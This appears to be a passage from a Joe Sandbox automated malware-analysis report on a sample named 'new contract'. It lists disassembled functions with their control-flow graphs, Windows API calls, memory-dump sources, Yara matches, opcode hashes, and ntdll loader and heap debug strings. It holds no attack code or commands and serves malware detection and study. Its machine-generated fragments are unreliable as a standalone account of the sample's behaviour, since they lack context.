                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 231 408310-40831f 232 408328-40835a call 41c9c0 call 40ace0 call 414e40 231->232 233 408323 call 41be20 231->233 240 40835c-40836e PostThreadMessageW 232->240 241 40838e-408392 232->241 233->232 242 408370-40838a call 40a470 240->242 243 40838d 240->243 242->243 243->241
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                            • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                                                            • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                                                            • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                                                                                                            Function 0041A787 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 267 41a787-41a7be call 41af20 270 41a7bf-41a7c4 LookupPrivilegeValueW 267->270
                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: 39026f5965a9e8556e010cdae46e6e53f68c4aedf67d634c4040111bc5648c2e
                                                                                                                                                                            • Instruction ID: 613681ee16ad2e00208a96de23f0b8a9ba4c4472475d2bb781bd528aee46b068
                                                                                                                                                                            • Opcode Fuzzy Hash: 39026f5965a9e8556e010cdae46e6e53f68c4aedf67d634c4040111bc5648c2e
                                                                                                                                                                            • Instruction Fuzzy Hash: 71E06DB16002046FCB24DF95CC85EEF3769EF84254F158569F9099B241CA34E851CBA1
                                                                                                                                                                            Function 0041A803 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 271 41a803-41a805 272 41a807-41a837 call 41af90 271->272 273 41a7bf-41a7c4 LookupPrivilegeValueW 271->273
                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: f924cb94eadc6d257736d8bfdea27727e1d9d93b62097328727e3fbba155a19f
                                                                                                                                                                            • Instruction ID: 2a6f473bbb32cfa337600a60209bf369941281673541ac6456650ec3ae10958d
                                                                                                                                                                            • Opcode Fuzzy Hash: f924cb94eadc6d257736d8bfdea27727e1d9d93b62097328727e3fbba155a19f
                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE026761092800BD746FF78E8C14E6BFA0DE81238314899FE4A84B202D17BD12F8B88
                                                                                                                                                                            Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 277 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                            • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                            • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                                                                                                            Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 280 41a790-41a7a9 281 41a7af-41a7c4 LookupPrivilegeValueW 280->281 282 41a7aa call 41af20 280->282 282->281
                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                            • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                            • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                                                                            Function 01662C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
                                                                                                                                                                            • Instruction ID: ed04d65438d043016408d079d6d25e8f8396ab6dfcbe044dfe025994d13a91ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 16B09B719015C5C9DB51F7644E0C717790477D0701F15C175D6030751F4738C5D1E275

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 016A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                                                            • Opcode ID: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
                                                                                                                                                                            • Instruction ID: 2eed2a66f7b874528d3001fed460f260983ad90ae624c5de66e018a8a2708a28
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
                                                                                                                                                                            • Instruction Fuzzy Hash: A6929971688342ABE721CE28CC90B6BBBE9BB84754F44482DFA9597351D770EC44CF92
                                                                                                                                                                            Function 01658620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • corrupted critical section, xrefs: 016954C2
                                                                                                                                                                            • undeleted critical section in freed memory, xrefs: 0169542B
                                                                                                                                                                            • Critical section address, xrefs: 01695425, 016954BC, 01695534
                                                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954E2
                                                                                                                                                                            • double initialized or corrupted critical section, xrefs: 01695508
                                                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954CE
                                                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01695543
                                                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 016954B6
                                                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0169540A, 01695496, 01695519
                                                                                                                                                                            • 8, xrefs: 016952E3
                                                                                                                                                                            • Critical section address., xrefs: 01695502
                                                                                                                                                                            • Address of the debug info found in the active list., xrefs: 016954AE, 016954FA
                                                                                                                                                                            • Thread identifier, xrefs: 0169553A
                                                                                                                                                                            • Critical section debug info address, xrefs: 0169541F, 0169552E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                                                            • Opcode ID: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
                                                                                                                                                                            • Instruction ID: 8994ba9d461c7da84f86bb1280a13b37959cc491b21b28ff538c93cd1f6d9a25
                                                                                                                                                                            • Opcode Fuzzy Hash: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
                                                                                                                                                                            • Instruction Fuzzy Hash: A0819AB1E01358AFDF26CF99CC41BAEBBB9EB48710F10415AF506B7681D3B5A941CB60
                                                                                                                                                                            Function 016529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016925EB
                                                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01692602
                                                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01692412
                                                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01692624
                                                                                                                                                                            • @, xrefs: 0169259B
                                                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0169261F
                                                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01692409
                                                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016924C0
                                                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016922E4
                                                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01692498
                                                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01692506
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                                                            • Opcode ID: 0addbda2fce9b074ce08ffa26b08aed430abe3267155031481cd85fbcb12e3a9
                                                                                                                                                                            • Instruction ID: 50477a5b079f1cc7fdc7de9d36a4a02eaa918015fe78191584f7f5ff1be26f50
                                                                                                                                                                            • Opcode Fuzzy Hash: 0addbda2fce9b074ce08ffa26b08aed430abe3267155031481cd85fbcb12e3a9
                                                                                                                                                                            • Instruction Fuzzy Hash: 480271F1D002299BDF61DB54CC90BDAB7B8AF54704F4041DEEA49A7242DB30AE85CF99
                                                                                                                                                                            Function 016C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                                                            • Opcode ID: 1e2792530a14b62722e5c21aabb334c1ab2bbd3273eecfb7868f395b19370922
                                                                                                                                                                            • Instruction ID: 4dd67992774c87bca94494996c5272a7ec8608ba93582e4e971314c33fae4315
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e2792530a14b62722e5c21aabb334c1ab2bbd3273eecfb7868f395b19370922
                                                                                                                                                                            • Instruction Fuzzy Hash: 3151AD725143119BD335DF188C44BBBBBECFF98A50F14491DEA9987241E770E605CB92
                                                                                                                                                                            Function 016D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                                                            • Opcode ID: eaa1250881261e6ac580c6a5e7dd4f10aa2a52c2d8dfec4e771cb6ba0057a6fd
                                                                                                                                                                            • Instruction ID: 44ac22dbe00aefd5692c418cb075a0d912af376f58072904bc4d210b271a25ea
                                                                                                                                                                            • Opcode Fuzzy Hash: eaa1250881261e6ac580c6a5e7dd4f10aa2a52c2d8dfec4e771cb6ba0057a6fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 61D1DD35A10686DFDB22DF68C840AADBBF2FF5A720F18805DF9469B352C7749941CB14
                                                                                                                                                                            Function 016A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 016A8B8F
                                                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016A8A67
                                                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016A8A3D
                                                                                                                                                                            • VerifierFlags, xrefs: 016A8C50
                                                                                                                                                                            • VerifierDebug, xrefs: 016A8CA5
                                                                                                                                                                            • VerifierDlls, xrefs: 016A8CBD
                                                                                                                                                                            • HandleTraces, xrefs: 016A8C8F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                                                            • Opcode ID: efeb6dc1baae828162660295e38308363b46212fb0f0217a999ac86ac09eb21c
                                                                                                                                                                            • Instruction ID: 48a7302cf29a48ba59118e43c03b7e11610c999f4981a013c636d59cef2a29e5
                                                                                                                                                                            • Opcode Fuzzy Hash: efeb6dc1baae828162660295e38308363b46212fb0f0217a999ac86ac09eb21c
                                                                                                                                                                            • Instruction Fuzzy Hash: 539156B2645302AFD326EF6CCC90B5BBBE9AB95724F84445CFA426B240C7709D01CF99
                                                                                                                                                                            Function 0162EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                            • API String ID: 0-1109411897
                                                                                                                                                                            • Opcode ID: c87df16f2d5bc6dcf328cde2503ac8bd939076eb9ee8a62d6f6b08de7d8c4ff4
                                                                                                                                                                            • Instruction ID: ca223d25dbfd55ba54ec9ab47de6604b1d76a6f0ea5fd593dedacc73472a330f
                                                                                                                                                                            • Opcode Fuzzy Hash: c87df16f2d5bc6dcf328cde2503ac8bd939076eb9ee8a62d6f6b08de7d8c4ff4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FA24974A05A2A8FDB64DF19CC987A9BBB5EF45304F2442E9D90DA7390DB319E81CF40
                                                                                                                                                                            Function 016563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                                                            • Opcode ID: 76746f02d1e4142bd119b802e9892be6deebcaa499b140034f286a70b4244438
                                                                                                                                                                            • Instruction ID: ee014a96e8cb5ad270e7316f341e71a211a805a4ece796aca13e4a4a7b885772
                                                                                                                                                                            • Opcode Fuzzy Hash: 76746f02d1e4142bd119b802e9892be6deebcaa499b140034f286a70b4244438
                                                                                                                                                                            • Instruction Fuzzy Hash: EC914770B013129BDF39DF58DD94BAA7BAABF41B34F40816CE9016B385DB709842C794
                                                                                                                                                                            Function 0161645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitShimEngine, xrefs: 016799F4, 01679A07, 01679A30
                                                                                                                                                                            • apphelp.dll, xrefs: 01616496
                                                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01679A2A
                                                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016799ED
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01679A11, 01679A3A
                                                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01679A01
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                                                            • Opcode ID: 9ca62ff98501245d31f174993dd74b4f6c8499cba6d683faaa52f4f760554c16
                                                                                                                                                                            • Instruction ID: 0f85633c8adf0777c03b097af34fc3bb54f5bc783f4fe9970db0082ec51c0e7b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ca62ff98501245d31f174993dd74b4f6c8499cba6d683faaa52f4f760554c16
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C51E1712083019FE725EF28CC91A6B77E9FF84768F04491DE985972A4DB70E944CB92
                                                                                                                                                                            Function 01652674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016921BF
                                                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01692178
                                                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01692160, 0169219A, 016921BA
                                                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01692180
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01692165
                                                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0169219F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                                                            • Opcode ID: 59eac647a97c6b4e53b377dfeef0ddf3e1ea80861bcce05535e163657380da44
                                                                                                                                                                            • Instruction ID: d0f60609bb4faeeeca29bbf3fd6feee4ca54ba8b4a4ed42a1b9f5ef82192c684
